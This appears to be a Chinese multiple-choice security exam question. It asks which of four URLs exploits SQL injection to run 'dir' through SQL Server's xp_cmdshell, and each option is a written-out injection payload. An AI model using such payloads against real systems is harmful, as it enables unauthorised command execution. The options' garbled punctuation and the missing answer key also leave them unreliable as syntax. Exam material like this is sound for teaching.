试题详情

以下哪条命令能利用“SQL注入”漏洞动用XP_cmdshell存储过程,获得某个子目的清单?( )

Ahttp://localhost/script?’:EXEC master..XP_cmdshell ’dir’:--

Bhttp://localhost/script?1’:EXEC master..XP_cmdshell ’ dir’:--

Chttp://localhost/script?0’:EXEC master..XP_cmdshell ’ dir’:--

Dhttp://localhost/script?1’:EXEC master..XP_cmdshell ’ dir’--